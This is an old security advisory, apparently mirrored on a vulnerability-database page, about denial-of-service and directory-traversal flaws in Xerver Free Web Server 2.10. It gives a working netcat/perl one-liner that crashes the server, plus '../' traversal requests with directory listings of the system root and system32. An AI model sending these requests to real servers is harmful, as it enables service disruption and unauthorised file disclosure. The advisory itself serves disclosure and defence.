Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

Xerver-2.10.txt

🗓️ 08 Mar 2002 00:00:00Reported by Alex HernandezType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 26 Views

Xerver Free Web Server 2.10 has vulnerabilities allowing file disclosure and Denial of Service attacks.

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`  
------oOo------  
Xerver Free Web Server 2.10 file Disclosure & DoS (Denial of Service Attack).  
------oOo------  
  
Company Affected: www.JavaScript.nu  
Version: v2.10  
Date Added: 02-27-02  
Size: 287 KB  
OS Affected: : Windows ALL, Linux ALL, BSD all, Solaris ALL, MAC ALL.  
  
Author:  
  
** Alex Hernandez <[email protected]>  
** Thanks all the people from Spain and Argentina.  
** Special Greets: White-B, Pablo S0r, Paco Spain, G.Maggiotti.  
  
Also a greet to "KF" <[email protected]>  
http://www.snosoft.com for invitme to participate for more   
research about the Bugs, Exploits and Vulnerabilities :-)   
thanks friend, u have publish exelents bugs :X   
  
----=[Brief Description]=------------  
  
  
Xerver Free Web Server is a tiny web server allowing you to run CGI/perl scripts on   
your computer. Xerver includes features such as: Allow/forbid directory listing,   
create your own error pages ("404 File Not Found"), allow/deny CGI-scripts, choose   
your own index file extensions, share/unshare hidden files or files with certain   
file extensions, share unlimited folders etc. Xerver is a tiny, fast and free web   
server, but is still advanced and supports both HTTP/1.1 and HTTP/1.0 and all HTTP   
methods (GET, POST and HEAD)."Run CGI/perl scripts on your computer.  
  
  
----=[Summary]=----------------------  
  
Exist two vulnerabilities:  
  
  
The port 32123 usually is configuration of the server , exist a one metod for crass this  
system calling the drive C:\ several times, another bug exists on server remote any   
user can see all the files configuration on the system also even though one has formed   
the services to deny the folders or files any user can access via remote to 80 port   
finding the configuration of the own server.  
  
  
------oOo------  
Proof of concept  
  
  
DoS  
  
http://localhost:32123   
  
$ printf "GET /`perl -e 'print "C:/"x500000'`\r\n\r\n" |nc -vvn 127.0.0.1 32123  
  
  
Explotation:  
  
Example 1:  
  
$ nc -vvn 127.0.0.1 80  
(UNKNOWN) [127.0.0.1] 80 (?) open  
GET /unix/ALEX/Xerver2.10/../../../ HTTP/1.0  
HTTP/1.1 200 OK  
Date: March 6, 2002 8:52:51 PM CST  
Server: Xerver_v2  
Connection: close  
Location: /  
Content-Type: text/html  
  
<HTML><HEAD><TITLE>Directory Listing for /</TITLE></HEAD><BODY BGCOLOR=white COL  
OR=black><FONT FACE="tahoma, arial, verdana"><H2>Directory Listing for /</H2></F  
ONT><PRE>&nbsp;&nbsp;&nbsp;&nbsp;<B>File name File size&nb  
sp;&nbsp;&nbsp;&nbsp;&nbsp;Last modified</B>  
  
  
Program Files  
--------------------------------------------------------------------------------  
<A HREF="Program Files" STYLE="text-decoration: none;"><IMG SRC="/Image:showFold  
er" BORDER=0> Program Files</A>  
--------------------------------------------------------------------------------  
  
RECYCLER  
--------------------------------------------------------------------------------  
<A HREF="RECYCLER" STYLE="text-decoration: none;"><IMG SRC="/Image:showFolder" B  
ORDER=0> RECYCLER</A>  
--------------------------------------------------------------------------------  
  
WINNT  
--------------------------------------------------------------------------------  
<A HREF="WINNT" STYLE="text-decoration: none;"><IMG SRC="/Image:showFolder" BORD  
ER=0> WINNT</A>  
-------------------------------------------------------------------------------  
  
[...]  
  
or via web:  
  
  
  
http://localhost/unix/ALEX/Xerver2.10/../../../   
  
Directory Listing for /  
  
File name File size Last modified  
  
$unix  
ALEX  
Documents and Settings  
My Downloads  
Program Files  
RECYCLER  
  
[...]  
  
  
Example 2:  
  
$ nc -vvn 127.0.0.1 80  
(UNKNOWN) [127.0.0.1] 80 (?) open  
GET /unix/ALEX/Xerver2.10/../../../WINNT/system32/ HTTP 1.0  
  
The results is:   
  
Directory Listing for /WINNT/system32/  
  
  
File name File size Last modified  
../  
AdCache  
CatRoot  
Com  
DTCLog  
DirectX  
GroupPolicy  
Hummbird  
IOSUBSYS  
Macromed  
Microsoft  
  
[...]  
  
  
------oOo------------------------------------  
Vendor Response:  
The vendor was notified  
"Omid Rouhani" [email protected]  
htttp://www.JavaScript.nu  
Patch Temporary: Restricted files and Directories  
  
Alex Hernandez <[email protected]> (c) 2002.  
  
------oOo------------------------------------  
  
  
  
  
  
  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
08 Mar 2002 00:00Current
7.4High risk
Vulners AI Score7.4
xerver free web serverfile disclosuredenial of servicevulnerabilitieshttp methodscgi scripts.
26
.json
Report